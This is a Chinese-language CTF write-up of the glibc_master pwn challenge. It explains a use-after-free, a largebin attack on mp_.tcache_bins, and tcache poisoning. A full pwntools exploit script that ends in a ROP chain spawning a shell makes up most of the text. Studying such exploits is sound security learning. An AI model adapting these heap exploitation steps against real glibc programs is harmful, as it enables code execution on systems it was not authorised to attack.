
[长城杯 2022 高校组]glibc_master peiwithhao的WriteUp

2023-09-06 12:19By
peiwithhao
PWNUAF

题目环境为 glibc 2.31(Ubuntu 2.31-0ubuntu9.9),下文 exp 中 main_arena、mp_ 与 gadget 的硬编码偏移均只对该版本有效。
漏洞点位于 delete 函数:free 后未清空指针,留下悬垂指针(UAF);此外堆块申请大小被限制在 largebin 范围内,无法直接申请 tcache / fastbin 大小的 chunk。
存在 UAF,我们先通过 show 一个已进入 largebin 的悬垂 chunk 泄露 libc 基地址,再利用 largebin attack 向 mp_.tcache_bins 写入一个堆地址,把 tcache 能容纳的最大 chunk 大小改大。
这里利用的是 unsortedbin 遍历时把 chunk 置入 largebin 的那段逻辑(可对照 _int_malloc 源码),写入原理与 unsortedbin attack 类似:victim->bk_nextsize->fd_nextsize = victim,因此把被控 chunk 的 bk_nextsize 改为 &mp_.tcache_bins - 0x20 即可。改大 mp_.tcache_bins 后,0x510 / 0x530 大小的 chunk 也会进入 tcache,随后进行常规 tcache poisoning(2.31 无 safe-linking,next 指针无需加密):先把 chunk 分配到 _environ 泄露栈地址,再把 chunk 分配到返回地址处,写入 ROP 链(ret; pop rdi; "/bin/sh"; system)劫持返回地址。
exp如下:

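from pwn import *
from ctypes import *

# [长城杯 2022 高校组] glibc_master
#
# delete() leaves a dangling pointer (UAF) and allocations are limited to
# largebin sizes.  Plan:
#   1. leak libc through the UAF on a chunk sitting alone in a largebin;
#   2. largebin attack: write a heap pointer over mp_.tcache_bins so that
#      0x510 / 0x530 chunks start going to tcache;
#   3. tcache poisoning to read _environ (stack leak);
#   4. tcache poisoning again to get a chunk on top of a saved return
#      address and drop a ret2libc ROP chain there.
#
# Every absolute offset below (main_arena bins, mp_, ROP gadgets) is for the
# target's glibc 2.31-0ubuntu9.9 and must match the libc at LIBC_PATH; with
# a different build the symbols and the hardcoded offsets silently disagree.

context(arch='amd64', os='linux', log_level='info')
context.terminal = ['tmux', 'splitw', '-h']

# Local copy of the *remote* libc: _environ / system / "/bin/sh" are resolved
# from it, while the bin and mp_ offsets are hardcoded, so both must come
# from the same build.
LIBC_PATH = '/lib/x86_64-linux-gnu/libc.so.6'

# XOR key the binary applies byte-wise to edit() input (the base64 alphabet).
# Kept as bytes so the XOR yields ints and no str->bytes coercion is needed.
key = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
key_len = len(key)

s   = lambda content: io.send(content)
sl  = lambda content: io.sendline(content)
sa  = lambda content, send: io.sendafter(content, send)
sla = lambda content, send: io.sendlineafter(content, send)
rc  = lambda number: io.recv(number)
ru  = lambda content: io.recvuntil(content)
rcl = lambda: io.recvline()


def slog(name, address):
    """Print a coloured `[+]name==>0x...` line for a leaked/computed address."""
    print("\033[40;34m[+]\033[40;35m" + name + "==>" + hex(address) + "\033[0m")


def debug(cmd=0):
    """Attach gdb to `io`; `cmd` is an optional gdbscript (0 / empty = none)."""
    if not cmd:
        gdb.attach(io)
    else:
        gdb.attach(io, cmd)


def get_address(mode=0):
    """Parse a leaked address from the stream.

    mode 0: read up to the first 0x7f byte and take the 6 bytes ending there
            (a little-endian x86-64 userland pointer, e.g. libc/stack);
    mode 1: 6 raw bytes;
    mode 2: 12 hex characters;
    mode 3: 16 hex characters.
    Returns 0 for any other mode.  Mode 0 blocks until a 0x7f byte arrives,
    so it only suits leaks that are known to contain one.
    """
    if mode == 0:
        return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))
    if mode == 1:
        return u64(rc(6).ljust(8, b'\x00'))
    if mode == 2:
        return int(rc(12), 16)
    if mode == 3:
        return int(rc(16), 16)
    return 0


def add(index, size):
    """Menu 1: allocate a chunk of `size` bytes into slot `index`."""
    sla(">>", "1")
    sla("index:\n", str(index))
    sla("size:\n", str(size))


def edit(index, con):
    """Menu 2: write `con` into the chunk in slot `index`.

    The binary XORs each received byte with key[i % key_len], so the payload
    is pre-XORed here to land verbatim in memory.  `con` may be bytes or a
    latin-1 str.  Built as a bytes object so no implicit encoding can alter
    bytes >= 0x80.  Note that sendline appends '\\n', which, if the binary
    consumes it, lands (XORed) one byte past the payload -- the original
    exploit relied on that being harmless.
    """
    if isinstance(con, str):
        con = con.encode('latin-1')
    payload = bytes(b ^ key[i % key_len] for i, b in enumerate(con))
    sla(">>", "2")
    sla("index:\n", str(index))
    sla("context:\n", payload)


def show(index):
    """Menu 3: print the chunk in slot `index` (works on freed chunks: UAF).

    Uses sendafter (no trailing newline) unlike add()/edit(); the original
    exploit depends on this, presumably because of how the binary reads the
    index -- do not "fix" it to sendlineafter.
    """
    sla(">>", "3")
    sa("index:\n", str(index))


def delete(index):
    """Menu 4: free the chunk in slot `index`; the slot pointer is not cleared."""
    sla(">>", "4")
    sa("index:\n", str(index))


# `python3 exp.py LOCAL` runs against ./pwn; the default is the remote target.
if args.LOCAL:
    io = process('./pwn')
else:
    io = remote("node4.anna.nssctf.cn", 28257)
libc = ELF(LIBC_PATH)

# --- 1. libc leak ----------------------------------------------------------
add(0, 0x448)           # victim chunk (0x450) for the largebin attack
add(1, 0x508)           # separator between chunk 0 and chunk 2
add(2, 0x438)           # smaller large chunk (0x440), sorted in step 2
delete(0)               # chunk 0 -> unsortedbin; slot 0 still points to it
add(3, 0x508)           # request > 0x450: chunk 0 is sorted into its largebin
add(4, 0x508)           # chunks 4-7 are the tcache-poisoning material later
add(5, 0x508)
add(6, 0x528)
add(7, 0x528)
show(0)                 # fd of the lone largebin chunk = its bin head in main_arena
libc_base = get_address() - 0x1ecfe0      # largebin head offset, 2.31-0ubuntu9.9
slog("libc_base", libc_base)
mptcachebins = libc_base + 0x1ec2d0       # &mp_.tcache_bins, 2.31-0ubuntu9.9
slog("mp_.tcache_bins", mptcachebins)

# --- 2. largebin attack on mp_.tcache_bins ---------------------------------
delete(2)               # chunk 2 -> unsortedbin; it is smaller than chunk 0, so
                        # when sorted, glibc runs
                        #   victim->bk_nextsize->fd_nextsize = victim
                        # with victim->bk_nextsize taken from chunk 0.
# Rewrite freed chunk 0 through the dangling slot: fd/bk = unsortedbin head
# (a valid arena pointer), fd_nextsize = 0, bk_nextsize = target - 0x20 so the
# fd_nextsize store (offset +0x20) hits mp_.tcache_bins.
edit(0, p64(libc_base + 0x1ecbe0) * 2 + p64(0) + p64(mptcachebins - 0x20))
add(8, 0x458)           # larger than chunk 2 -> chunk 2 gets sorted, write fires.
                        # mp_.tcache_bins is now a heap address, i.e. huge.

# --- 3. tcache poisoning -> _environ -> stack leak -------------------------
delete(5)
delete(4)               # tcache[0x510]: 4 -> 5
environ = libc_base + libc.sym['_environ']
edit(4, p64(environ))   # 2.31: no safe-linking, raw next pointer is fine
add(9, 0x508)           # hands back chunk 4
add(10, 0x508)          # hands back &_environ
show(10)
stack_addr = get_address()
slog("stack_addr", stack_addr)
ret_addr = stack_addr - 0x110    # saved return address relative to environ;
                                 # offset is specific to this binary's frames
slog("ret_addr", ret_addr)

# --- 4. tcache poisoning -> chunk on the return address --------------------
delete(7)
delete(6)               # tcache[0x530]: 6 -> 7
edit(6, p64(ret_addr))
add(11, 0x528)          # hands back chunk 6
add(12, 0x528)          # hands back ret_addr

# --- 5. ROP chain: ret (stack alignment) ; pop rdi ; "/bin/sh" ; system ----
pop_rdi = libc_base + 0x23b6a    # pop rdi ; ret   (2.31-0ubuntu9.9)
ret     = libc_base + 0x22679    # ret             (2.31-0ubuntu9.9)
system  = libc_base + libc.sym['system']
binsh   = libc_base + next(libc.search(b'/bin/sh'))
slog("binsh", binsh)
edit(12, p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system))
io.interactive()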
© 著作权归作者所有
